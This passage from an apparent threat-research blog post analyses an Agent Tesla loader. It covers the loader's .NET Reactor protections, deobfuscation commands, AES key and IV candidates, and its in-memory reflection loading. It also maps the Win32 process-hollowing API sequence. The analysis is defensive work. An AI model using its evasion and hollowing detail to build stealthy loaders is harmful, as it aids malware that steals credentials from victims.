                                        PE32 .NET Assembly (x86)                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Format                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        CLR v4.0.30319 / .NET 4.5.1                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        .NET Reactor 6.x                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Protection                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Commercial .NET protection framework                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Control Flow Obfuscation                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Protection                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Scrambles IL execution graph with fake branches                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Calls Encryption                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Protection                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Replaces method calls with encrypted delegates                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Virtualization                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Protection                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Converts methods to custom VM bytecode                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Anti-ILDASM                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Protection                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Breaks dnSpy/ILSpy decompilation                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Math Mutations                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Protection                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Replaces constants with equivalent expressions                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Fake .cctor names                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Protection                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C9"
                    data-col-index="2"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Poisons metadata to confuse decompilers                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A10"
                    data-col-index="0"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        2066 (forged)                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B10"
                    data-col-index="1"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        PE Timestamp                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C10"
                    data-col-index="2"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Anti-forensic timestamp manipulation                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-319'>
table#wpdtSimpleTable-319{ table-layout: fixed !important; }
table#wpdtSimpleTable-319 td, table.wpdtSimpleTable319 th { white-space: normal !important; }
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<p>The use of&nbsp;<strong>.NET Reactor 6.x</strong>&nbsp;explains why standard tools like de4dot fail without&nbsp;additional&nbsp;flags. The correct tool for this protection version is&nbsp;<strong>NETReactorSlayer</strong>:&nbsp;</p>



<pre class="wp-block-code"><code># Recommended approach: 
NETReactorSlayer.CLI.exe --no-pause ALTERNATE.dll 

# Alternative with de4dot (force detector): 
de4dot.exe ALTERNATE.dll --det reactor </code></pre>



<p>Partial&nbsp;deobfuscation&nbsp;via&nbsp;NETReactorSlayer&nbsp;reduced the binary from 79,872 → 42,496 bytes (a 46.8% reduction), confirming that&nbsp;nearly half&nbsp;the original file consisted purely of protection scaffolding. Post-deobfuscation&nbsp;entropy dropped from 6.0 → 5.86, and previously hidden IL structures became accessible for analysis.&nbsp;</p>



<h4 class="wp-block-heading">Internal Architecture (Post-Deobfuscation)&nbsp;</h4>



<p>Analysis of the partially&nbsp;deobfuscated&nbsp;binary (<em>alternate_Slayed.dll</em>) reveals the loader’s true internal architecture. Method names&nbsp;remain&nbsp;obfuscated (<em>smethod_10, Delegate10, Struct10</em>) — a&nbsp;pattern consistent with automated obfuscation frameworks — but&nbsp;the functional structure is now recoverable.&nbsp;</p>



<p>The loader implements a&nbsp;<strong>Read → Decrypt → Decompress → Execute</strong>&nbsp;pipeline:&nbsp;</p>



<pre class="wp-block-code"><code>&#091;ALTERNATE.dll Loader] 
        ↓ 
1. Read encrypted blob from embedded resource 
        ↓ 
2. Decrypt  →  RijndaelManaged (AES-256) + CryptoStream 

                   Key: hardcoded hex constant 

                   IV:  prepended to blob (first 16 bytes) 
        ↓ 
3. Decompress  →  System.IO.Compression (DeflateStream) 
        ↓ 
4. Load  →  Reflection (Assembly.Load from byte array) 

               ResolveMethod / GetMethod / CreateInstance 
        ↓ 

5. Invoke  →  DynamicMethod / CreateDelegate 

        ↓ 
6. Execute  →  Agent Tesla payload runs entirely in memory </code></pre>



<h4 class="wp-block-heading">Encryption Layer</h4>



<p>The loader uses <strong>RijndaelManaged</strong> (the .NET implementation of AES) with CryptoStream and explicit set_IV calls, confirming AES-CBC mode with a hardcoded key and a prepended IV. Four 256-bit (32-byte) key candidates were identified in the deobfuscated binary:</p>



<pre class="wp-block-code"><code>D5B7247C497788CF0031CEB06E3DF77A45FEF59F1E49633DC7159816D64759B5 

C61B1941CF756EB7551F7C661743802362728B785ADC22E860D269713DFB01A6 

C356AFF1A01C2B0DA472E584C8E3C8F875B9A24280435D42836A77B19F5A8C18 

F1C3EBE78BD8C38559BF3CFCC9A9FA37D221E31780774A3787E26160A61F5348 </code></pre>



<p>The encrypted payload blob is&nbsp;located&nbsp;at offset&nbsp;<em>0x4600</em>&nbsp;in the&nbsp;deobfuscated&nbsp;binary (relocated&nbsp;from&nbsp;<em>0x12000</em>&nbsp;in the original), measures&nbsp;<strong>2,560 bytes</strong>, and&nbsp;retains&nbsp;maximum entropy of&nbsp;<strong>7.93 / 8.0,&nbsp;</strong>confirming the AES encryption survived&nbsp;deobfuscation&nbsp;intact.&nbsp;</p>



<h4 class="wp-block-heading">Dynamic Execution via Reflection</h4>



<p>The loader avoids static linking of the final payload by using <strong>.NET Reflection</strong> to load and invoke Agent Tesla entirely from a byte array in memory. The relevant APIs observed post-deobfuscation:</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-320"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="5"
           data-wpID="320"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:34.1642228739%;                    padding:10px;
                    "
                    >
                                        API                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:14.66275659824%;                    padding:10px;
                    "
                    >
                                        Category                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:51.173020527859%;                    padding:10px;
                    "
                    >
                                        Role                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        DynamicMethod / CreateDelegate                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Reflection API                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Runtime method generation and invocation                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        ResolveMethod / GetMethod                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Reflection API                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Dynamic method resolution without static references                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        CreateInstance                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Reflection API                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Object instantiation from decrypted assembly                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Assembly.Load (byte[])                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Reflection API                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Loads Agent Tesla PE from memory -  no disk write                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-320'>
table#wpdtSimpleTable-320{ table-layout: fixed !important; }
table#wpdtSimpleTable-320 td, table.wpdtSimpleTable320 th { white-space: normal !important; }
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<h4 class="wp-block-heading">Process Hollowing&nbsp;—&nbsp;Full&nbsp;Win32 API Map&nbsp;</h4>



<p>The&nbsp;deobfuscated&nbsp;binary exposes the complete Process Hollowing implementation as UTF-16 P/Invoke strings. The API sequence is a textbook&nbsp;<strong>32-bit hollowing</strong>&nbsp;with Wow64 support for 32→64-bit environments:&nbsp;</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-321"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="11"
           data-wpID="321"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:37.610619469027%;                    padding:10px;
                    "
                    >
                                        API + Offset                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:14.749262536873%;                    padding:10px;
                    "
                    >
                                        Library                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:47.6401179941%;                    padding:10px;
                    "
                    >
                                        Function                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        CreateProcessA @ 0x8EC4                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Win32 / kernel32                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Spawns aspnet_compiler.exe in suspended state                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        ZwUnmapViewOfSection @ 0x8E9A                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        ntdll                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Unmaps original executable from target memory                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        VirtualAllocEx @ 0x8E26                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Win32 / kernel32                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Allocates RWX memory in target process                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        WriteProcessMemory @ 0x8E44                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Win32 / kernel32                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Writes Agent Tesla PE headers and sections                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        ReadProcessMemory @ 0x8E6A                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Win32 / kernel32                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Verifies write integrity                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        GetThreadContext @ 0x8DE2                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Win32 / kernel32                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Reads EIP/EBX from suspended thread                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        SetThreadContext @ 0x8D94                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Win32 / kernel32                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Redirects EIP to Agent Tesla entry point                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Wow64GetThreadContext @ 0x8DD8                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Win32 / kernel32                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C9"
                    data-col-index="2"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        32→64-bit context read                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A10"
                    data-col-index="0"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Wow64SetThreadContext @ 0x8D8A                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B10"
                    data-col-index="1"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Win32 / kernel32                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C10"
                    data-col-index="2"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        32→64-bit context write                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A11"
                    data-col-index="0"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        ResumeThread @ 0x8D70                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B11"
                    data-col-index="1"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        Win32 / kernel32                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C11"
                    data-col-index="2"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        Resumes thread -  Agent Tesla begins executing                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-321'>
table#wpdtSimpleTable-321{ table-layout: fixed !important; }
table#wpdtSimpleTable-321 td, table.wpdtSimpleTable321 th { white-space: normal !important; }
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<p>The hollower&nbsp;contains&nbsp;hardcoded error strings —<em>&#8220;Failed to allocate memory&#8221;, &#8220;Failed to&nbsp;unmap&nbsp;section&#8221;, &#8220;Failed to update PEB&#8221;—&nbsp;</em>suggesting it was built from a reusable hollowing template with debug output preserved, a common trait in commodity malware kits.&nbsp;</p>



<h4 class="wp-block-heading">Execution Control Flags&nbsp;</h4>



<p>Three internal execution control strings were&nbsp;recovered&nbsp;post-deobfuscation: ALTERNATE, EXECUTE, and LAUNCH. These&nbsp;likely govern&nbsp;different execution paths within the loader —&nbsp;for&nbsp;example, switching between in-process shellcode execution and remote process hollowing depending on runtime conditions such as privilege level or AV detection.&nbsp;</p>



<h4 class="wp-block-heading">Stage 4 — Agent Tesla Deployed In-Memory&nbsp;</h4>



<p>The Agent Tesla payload is stored as a 2,560-byte AES-encrypted and deflate-compressed blob embedded in the loader’s&nbsp;<em>.text</em>&nbsp;section.&nbsp;The double-layering&nbsp;—&nbsp;compressed&nbsp;and then encrypted —&nbsp;ensures&nbsp;the payload has no recognizable structure at rest and defeats both signature and entropy-based detection.&nbsp;</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-322"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="8"
           data-wpID="322"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:40.494590417311%;                    padding:10px;
                    "
                    >
                                        				Value                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:15.919629057187%;                    padding:10px;
                    "
                    >
                                        				Field                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:43.585780525502%;                    padding:10px;
                    "
                    >
                                        				Notes                    </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        				0x4600 – 0x5000				(deobfuscated)                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        				Location                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        				Relocated				from 0x12000 in original binary                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        				2,560 bytes                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        				Size                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        				Encrypted + compressed				payload                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        				7.93 / 8.0                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        				Entropy                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        				Maximum -  AES encryption				confirmed                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        				256 / 256                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        				Unique bytes                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        				Fully uniform distribution                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        				RijndaelManaged (AES-256				CBC)                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        				Cipher                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        				Confirmed				via CryptoStream + set_IV calls                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        				f87d105625dbc96f63d5b4b81dce4c39                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        				IV candidate                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        				First 16 bytes of blob                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        				DeflateStream                    </td>
